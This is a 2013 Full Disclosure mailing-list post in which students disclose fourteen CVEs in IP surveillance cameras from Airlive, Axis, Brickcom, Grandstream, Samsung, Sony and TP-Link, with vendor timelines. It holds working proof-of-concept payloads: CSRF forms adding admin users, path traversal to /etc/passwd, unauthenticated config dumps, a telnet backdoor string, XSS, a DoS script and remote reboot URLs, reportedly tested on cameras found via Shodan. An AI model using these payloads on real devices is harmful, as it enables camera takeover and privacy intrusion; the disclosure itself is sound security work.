Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

Security Analysis of IP video surveillance cameras
From: Javier Repiso Sánchez <javier.repiso () hotmail com>
Date: Wed, 12 Jun 2013 10:19:16 +0200

Dear sirs,


We are a group of students from the European University of Madrid who have made a security analysis of IP video 
surveillance cameras as the final project of Security and Information Technology Master.


In total, we analyzed 9 different camera brands and we have found 14 vulnerabilities. 
From these vulnerabilities, there are all kinds: simple vulnerabilities, such as XSS or CRSF, and very harmful and 
dangerous vulnerabilities such as privilege escalation or bypass authentication.


**Note that all the analysis we have done has been from cameras found through Google dorks and Shodan, so we have not 
needed to purchase any of them for our tests. Everything we needed was online.



In conclusion we can say that the vast majority of security cameras are not ready to connect to an open network where 
everyone can get to access them.

We proceed to describe all previously reported vulnerabilities order by brands:

===========================================================================
AIRLIVE
====================================================================
===========================================================================

1.Advisory Information
Title: Airlive Multiple Vulnerabilities
Date Published: 12/06/2013
Date of last updated: 12/06/2013

2.Vulnerability Description
Multiple vulnerabilities have been found in this devices:
-CVE-2013-3540. Cross Site Request Forgery(CWE-352) and Clickjacking(CAPEC-103)
-CVE-2013-3541. Relative Path Traversal(CWE-23).
-CVE-2013-3686. Information Exposure(CWE-200) and Permissions, Priveleges and Access Controls(CWE-264)
-CVE-2013-3687. Clear Text Storage of Sensitive Information(CWE-312)
-CVE-2013-3691. Denial of Service

3.Affected Products
CVE-2013-3541, CVE-2013-3686, the following product is affected: WL2600CAM
CVE-2013-3540, CVE-2013-3687, the following products are affected: POE2600HD, POE250HD, POE200HD, OD-325HD, OD-2025HD, 
OD-2060HD, POE100HD.
It’s possible others models are affected but they were not checked.

4.PoC
4.1.Cross Site Request Forgery (CSRF)
CVE-2013-3540 CSRF via GET method. Targeted attack to any administrator.
These cameras use a web interface which is prone to CSRF vulnerabilities. 
A malicious user can try targeted attacks by sending a special CSRF vector. This allows you to manipulate web interface 
parameters.
In the following example we will make a vector to create an alternative user with administration credentials.
_____________________________________________________________________________
http://xx.xx.xx.xx/cgi-bin/admin/usrgrp.cgi?user=test1&pwd=test1&grp=administrator&sgrp=ptz&action=add&redirect= 
_____________________________________________________________________________

4.2.Relative Path Traversal
CVE-2013-3541, Transversal Path that’s allow you to read file system configuration.
_____________________________________________________________________________
http://xx.xx.xx.xx/cgi-bin/admin/fileread?READ.filePath=../../../../etc/passwd
_____________________________________________________________________________

4.3.Sensitive Information Exposure + Privilege Escalation
CVE-2013-3686, Sensitive Exposure of sensitive data by writing the following URL
_____________________________________________________________________________
http://xx.xx.xx.xx/cgi-bin/operator/param?action=list&group=General.UserID
_____________________________________________________________________________
We can decode Admin password (base64). 
Now we can relogin like admin user and we have made the escalation privilege

4.4.Clear Text Storage of Sensitive Information
CVE-2013-3687 You can find all the sensitive information about the device in plain text inside the backup file. 
You can open with any text editor and look for user's information for example, passwords, users and so on.

4.5.Denial of Service (DoS)
Use CVE-2013-3691, DoS by overbuffing path ‘/’. A request with a large number of ‘a’ can take down the http service 
from the camera device.
_____________________________________________________________________________
Request: http://xx.xx.xx.xx/[a*3000]
_____________________________________________________________________________
You will get the next message, Conexion has been reset. After remove de adds and refresh it you will get the next 
message, Can't Connect

It will be down for around 2min but if we are doing the request once and again each 1min for example, the camera won’t 
recuperate ever itself

The following Python script could be used to test the DoS:
_____________________________________________________________________________
    @    request = 'GET /' + ‘A’ * 3000 + '.html HTTP/1.0\r\n'
    @    s = socket.socket()
    @    s.connect((cam_ip, 80))
    @    s.send(request)
    @    response = s.recv(1024)
    @    s.close()
_____________________________________________________________________________

5.Credits

-CVE-2013-3541 was discovered by Eliezer Varadé Lopez, Javier Repiso Sánchez and Jonás Ropero Castillo.
-CVE-2013-3691 was discovered by Javier Repiso Sánchez and Jonás Ropero Castillo
-CVE-2013-3540, CVE-2013-3686, CVE-2013-3687 was discovered by Jonás Ropero Castillo.

6.Report Timeline
-2013-05-31: Students team notifies the Airlive Customer Support of the vulnerabilities. No reply received.
-2013-06-03: Students asks for a reply.
-2013-06-05: Airlive team reports to the technical support to analyze the vulnerabilities.


========================================================================
AXIS
====================================================================
========================================================================

1.Advisory Information
Title: AXIS Media Control ActiveX vulnerability
Date Published: 12/06/2013
Date of last updated: 12/06/2013

2.Vulnerability Description
A vulnerability has been found in this devices:
-CVE-2013-3543. Exposed Unsafe ActiveX Method(CWE-618)

3.Affected Products
CVE-2013-3543, all camera devices using AXIS Media Control (AMC) are affected
The vulnerability affects to the latest version of the software (6.2.10.11 which was released on October 19, 2012)

4.PoC
4.1.Exposed Unsafe ActiveX Method - File Corruption.
In the vendor web, you could see that “AXIS Media Control is the recommended method for viewing video images in 
Microsoft Internet Explorer.”
Vulnerability which can be exploited by remote malicious person to overwrite arbitrary files with garbage data on a 
vulnerable system.
The vulnerability exists due to the ActiveX control including insecure "StartRecord()",  "SaveCurrentImage()" and 
"StartRecordMedia()" methods in "AxisMediaControlEmb.dll" DLL. 
This can be exploited to corrupt or create arbitrary files in the context of the current user.
In the following example we will corrupt regedit.exe using one of ActiveX vulnerable methods:
 
When we click on one of the buttons, we could see that regedit.exe is overwritten with garbage:
 
The following code could be used to test the vulnerability:
_____________________________________________________________________________
<html>
    <head>
        <title></title>
        <script language="javaScript" type="text/javascript">
            function startRecord(){
         var theFile = "FilePath//File_name_to_corrupt_or_create";
              MyActiveX.StartRecord(theFile);
            }
            function saveCurrentImage(){
         var theFile = "FilePath//File_name_to_corrupt_or_create";
              var theFormat = 1;
              MyActiveX.SaveCurrentImage(theFormat, theFile);
            }
            function startRecordMedia(){
         var theFile = "FilePath//File_name_to_corrupt_or_create";
              var theFlags = 1;
              var theMediaTypes  = "default"
              MyActiveX.StartRecordMedia(theFile, theFlags, theMediaTypes);
            }
        </script>
    </head>
    <body>
    <object id=MyActiveX classid="CLSID:{DE625294-70E6-45ED-B895-CFFA13AEB044}" style="width:640;height:480">
    <param name="MediaURL" value="http://xx.xx.xx.xx/mjpg/video.mjpg";>
    <param name="MediaType" value="mjpeg">
    <param name="Volume" value="1">
    <param name="ShowStatusBar" value="1">
    <param name="ShowToolbar" value="1">
    <param name="AutoStart" value="1">
    <param name="UIMode" value="ptz-relative">
    <param name="MediaType" value="mjpeg-unicast">
    <param name="StretchToFit" value="0">
    < param name ='PTZControlURL' value=http://xx.xx.xx.xx/axis-cgi/com/ptz.cgi> 
    </object>
    <br>
    <INPUT TYPE="button" VALUE="StartRecord" ONCLICK="startRecord()">
    <INPUT TYPE="button" VALUE="SaveCurrentImage" ONCLICK="saveCurrentImage()">
    <INPUT TYPE="button" VALUE="StartRecordMedia" ONCLICK="startRecordMedia()">
    </body>
</html>
_____________________________________________________________________________

5.Credits
-CVE-2013-3543 was discovered by Javier Repiso Sánchez.

6.Report Timeline
-2013-05-24: Students team notifies the Axis Customer Support of the vulnerability
-2013-05-24: Axis team asks for a report with technical information. 
-2013-05-26: Technical details sent to Axis. 
-2013-05-27: Axis team reports to the technical support to analyze the vulnerability.


============================================================================
BRICKCOM
====================================================================
============================================================================

1.Advisory Information
Title: Brickcom 100ap Series Vulnerabilities
Date Published: 12/06/2013
Date of last updated: 12/06/2013

2.Vulnerability Description
Multiples vulnerabilities have been found in this device.
-CVE-2013-3689. Authentication Bypass Issues(CWE-592) and Clear Text Storage of Sensitive Information(CWE-312)
-CVE-2013-3690. Cross Site Request Forgery(CWE-352),  Permissions, Privileges, and Access Control(CWE-264) and 
Execution with Unnecessary Privileges(CWE-250)

3.Affected Products
The following products are affected by these vulnerabilities:
FB-100Ap, WCB-100Ap, MD-100Ap, WFB-100Ap, OB-100Ae, OSD-040E
It’s possible others models are affected but they were not checked.
-CVE-2013-3689.
We have detected the following vulnerable firmwares: firmwareVersion=v3.0.6.7, v3.0.6.12, v3.0.6.16C1
In the next firmwares, you need to be log-in as administrator to download this file, but the information is in plain 
text yet: firmwareVersion=v3.1.0.8,v3.1.0.4
-CVE-2013-3690.
All firmware checked.

4.PoC
4.1.Authentication Bypass & Clear Text Storage of Sensitive Information
CVE-2013-3689, These allows you to download the all the configuration device file writing the next URL (all data shown 
will be in plain text). It’s not necessary any authentication.
_____________________________________________________________________________
http://xx.xx.xx.xx/configfile.dump?action=get
_____________________________________________________________________________

The most interesting parameters could be:
UserSetSetting.userList.users[nº].password= ***
UserSetSetting.userList.users[nº].name= ***

4.2.Cross Site Request Forgerty (CSRF) + Privilege Escalation
CVE-2013-3690, CSRF is possible via POST method. 
Also is possible a privilege escalation from a viewer user to an administrator user.
These cameras use a web interface which is prone to CSRF vulnerabilities. 
A malicious user can try targeted attacks by sending a special CSRF vector. This allows you to manipulate web interface 
parameters.
The following request can exploit this vulnerability
_____________________________________________________________________________
<html>
<body>
  <form name="gobap" action="http://xx.xx.xx.xx/cgi-bin/users.cgi"; method="POST">
    <input type="hidden" name="action" value="add">
    <input type="hidden" name="index" value="0">
    <input type="hidden" name="username" value="test2">
    <input type="hidden" name="password" value="test2">
    <input type="hidden" name="privilege" value="1">
    <script>document.gobap.submit();</script>
 </form>
</body>
</html>
_____________________________________________________________________________

5.Credits
-CVE-2013-3689 was discovered by Eliezer Varadé Lopez, Javier Repiso Sánchez and Jonás Ropero Castillo. 
-CVE-2013-3690 was discovered by Jonás Ropero Castillo. 

6.Report Timeline
-2013-05-31: Students team notifies the Brickcom Customer Support of the vulnerabilities. 
-2013-05-31: Brickcom answers saying this in accordance with some of the vulnerabilities, but there are some that they 
think is not correct.
(CVE-2013-3689, Authentication bypass and plain text information: After talk with vendor, it’s looks that after 
firmware 3.1.x.x, this bug is fixed but still the information is shown in plain text, so they should fix this second 
one)
-2013-06-03: Students check and communicate Brickcom the detail products and firmwares affected by vulnerabilities.
-2013-06-04: The vendor is agree with everything stated and reports that will fix it as soon as possible.


===============================================================================
GRANDSTREAM
====================================================================
===============================================================================

1.Advisory Information
Title: Grandstream Series Vulnerabilities
Date Published: 12/06/2013
Date of last updated: 12/06/2013

2.Vulnerability Description
The following vulnerability has been found in these devices:
-CVE-2013-3542. Backdoor in Telnet Protocol(CAPEC-443)
-CVE-2013-3962. Cross Site Scripting(CWE-79)
-CVE-2013-3963. Cross Site Request Forgery(CWE-352) and Clickjacking(Capec-103)

3.Affected Products
The following product are affected: GXV3501, GXV3504, GXV3601, GXV3601HD/LL, GXV3611HD/LL, GXV3615W/P, GXV3651FHD, 
GXV3662HD, GXV3615WP_HD and GXV3500.
-CVE-2013-3542, CVE-2013-3962 and CVE-2013-3963.
It’s possible others models are affected but they were not checked.

4.PoC
4.1.Backdoor in Telnet Protocol
CVE-2013-3542, Backdoor in Telnet Protocol
You should connect via telnet protocol to any camera affected (it's open by default).
After all you should be introduce the magic string “ !#/ ” as Username and as Password.
You will get the admin panel setting menu. If you type "help", the following commands are shown:
=======================================================
help, quit, status, restart, restore, upgrade, tty_test
=======================================================
 @@@ restore (Reset settings to factory default)

The attacker can take the device control, so it's make this devices very vulnerables.

4.2.Cross Site Scripting (XSS)
CVE-2013-3962, Cross Site Scripting non-persistent.
_____________________________________________________________________________
http://xx.xx.xx.xx/<script>alert(123)</script>
_____________________________________________________________________________

4.3.Cross Site Request Forgery (CSRF)
CVE-2013-3963, CSRF via GET method.
These cameras use a web interface which is prone to CSRF vulnerabilities. 
A malicious user can try targeted attacks by sending a special CSRF vector. This allows you to manipulate web interface 
parameters.
You should introduce the following URL to replicate the attack.
_____________________________________________________________________________
http://xx.xx.xx.xx/goform/usermanage?cmd=add&user.name=test3&user.password=test3&user.level=0
_____________________________________________________________________________

5.Credits
-CVE-2013-3542, CVE-2013-3962 and CVE-2013-3963 were discovered by Jonás Ropero Castillo.

6.Report Timeline
-2013-05-31: Students opens a ticket in order to notify the Grandstream Customer Support of the CVE-2013-3542. 
-2013-05-31: Grandstream team reports to the technical support to analyze the vulnerability.
-2013-06-11: Students opens a ticket in order to notify the Grandstream Customer Support of the CVE-2013-3962 and 
CVE-2013-3963 vulnerabilities. 



===========================================================================
SAMSUNG
====================================================================
===========================================================================

1.Advisory Information
Title: Samsung Series Vulnerability
Date Published: 12/06/2013
Date of last updated: 12/06/2013

2.Vulnerability Description
The following vulnerability has been found in these devices:
-CVE-2013-3964. Cross Site Scripting(CWE-79)

3.Affected Products
CVE-2013-3964, the following product are affected: SHR-5162, SHR-5082 
It’s possible others models are affected but they were not checked: 
SHR-5XXX,SHR-516X,SHR-508X,SHR-5042,SHR-4160,SHR-4081,SHR-2XXX,SHR-216X,SHR-208X,SHR-204X

4.PoC
4.1.Cross Site Scripting (XSS)
CVE-2013-3964, Cross Site Scripting non-persistent.
_____________________________________________________________________________
http://xx.xx.xx.xx/<script>alert(123)</script>
_____________________________________________________________________________

5.Credits
CVE-2013-3964 ,was discovered by Jonás Ropero Castillo. 

6.Report Timeline
-2013-06-11: Students try to contact to Samsung Support Centre, but the service is temporarily down. 


===========================================================================
SONY
====================================================================
===========================================================================

1.Advisory Information
Title: Sony CH, DH Series Vulnerability
Date Published: 12/06/2013
Date of last updated: 12/06/2013

2.Vulnerability Description
We have been found the next vulnerability in this devices
-CVE-2013-3539. Cross Site Request Forgery(CWE-352)

3.Affected Products
CVE-2013-3539, the following product are affected SNC CH140, SNC CH180, SNC CH240, SNC CH280, SNC DH140, SNC DH140T, 
SNC DH180, SNC DH240, SNC DH240T and SNC DH280.
It’s possible others models are affected but they were not checked.

4.PoC
4.1.Cross Site Request Forgery (CSRF)
CVE-2013-3539, CSRF via POST method. Targeted attack to any administrator.
These cameras use a web interface which is prone to CSRF vulnerabilities. 
A malicious user can try targeted attacks by sending a special CSRF vector. This allows you to manipulate web interface 
parameters.
This is our .html attack.
_____________________________________________________________________________
<html>
<body>
  <form name="SonyCsRf" action="http://xx.xx.xx.xx/command/user.cgi"; method="POST">
    <input type="Select" name="ViewerModeDefault" value="00000fff">
    <input type="Hidden" name="ViewerAuthen" value="off">
    <input type="Hidden" name="Administrator" value="YWRtaW46YWRtaW4=">
    <input type="Hidden" name="User1" value="xxxx,c0000fff">
    <input type="Hidden" name="User2" value="xxxx,c0000fff">
    <input type="Hidden" name="User3" value="dG1wdG1wOnRtcHRtcA==,c0000fff">
    <input type="Hidden" name="User4" value="Og==,00000fff">
    <input type="Hidden" name="User5" value="Og==,00000fff">
    <input type="Hidden" name="User6" value="Og==,00000fff">
    <input type="Hidden" name="User7" value="Og==,00000fff">
    <input type="Hidden" name="User8" value="Og==,00000fff">
    <input type="Hidden" name="User9" value="Og==,00000fff">
    <input type="Hidden" name="Reload" value="referer">
    <script>document.SonyCsRf.submit();</script>
 </form>
</body>
</html>
_____________________________________________________________________________
Now we can check that we have a new user in the configuration.

5.Credits
CVE-2013-3539 was discovered by Jonás Ropero Castillo. .

6.Report Timeline
-2013-05-25: Students team notifies the Sony Customer Support of the vulnerability. No reply received.


===========================================================================
TP-LINK
====================================================================
===========================================================================

1.Advisory Information
Title: TP-LINK TL-SC3171 Vulnerability
Date Published: 12/06/2013
Date of last updated: 12/06/2013

2.Vulnerability Description
The next vulnerability has been found in this device:
-CVE-2013-3688. Authentication Bypass Issues(CWE-592) and Execution with Unnecessary Privileges(CWE-250).

3.Affected Products
-CVE-2013-3688. The following product are affected: TP-LINK TL-SC3171
It’s possible others models are affected but they were not checked.

4.PoC
4.1.Execute Remote Command bypassing authentication
CVE-2013-3688, Execute Remote Command bypassing authentication.
We have found that is possible to reboot this kind of devices remotely. The attack vector is the following one:
_____________________________________________________________________________
http://xx.xx.xx.xx/cgi-bin/reboot
http://xx.xx.xx.xx/cgi-bin/hardfactorydefault
_____________________________________________________________________________

In the first one you will get blank page and you can’t re-login until the device is reboot.
In the second one, you will get a victory message and of course, in the next login you should introduce factory 
settings.

5.Credits
-CVE-2013-3688, was discovered by Eliezer Varadé Lopez, Javier Repiso Sánchez and Jonás Ropero Castillo. 

6.Report Timeline
-2013-05-31: Students team notifies the TP-Link Customer Support of the vulnerability. No reply received.
-2013-06-03: Students asks for a reply. 
-2013-06-04: TP-Link answers saying Coresecurity reported this vulnerability before and this has been corrected in a 
new beta firmware version.
-2013-06-04: Students answer to the vendor saying that this vulnerability is different from the Coresecurity 
vulnerabilities.
-2013-06-05: TP-Link answers saying this vulnerability is the same as the vulnerability reported by Coresecurity.
-2013-06-05: Students respond by explaining the details of the vulnerability and confirming that the vulnerability is 
different.
-2013-06-06: TP-Link answer confirming that the vulnerability is fixed with the latest patch for the reported 
vulnerabilities generated by Coresecurity. The beta version is available on the website of TP-Link  


AUTHORS

Eliezer Varadé Lopez
Javier Repiso Sánchez
Jonás Ropero Castillo
                                          
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault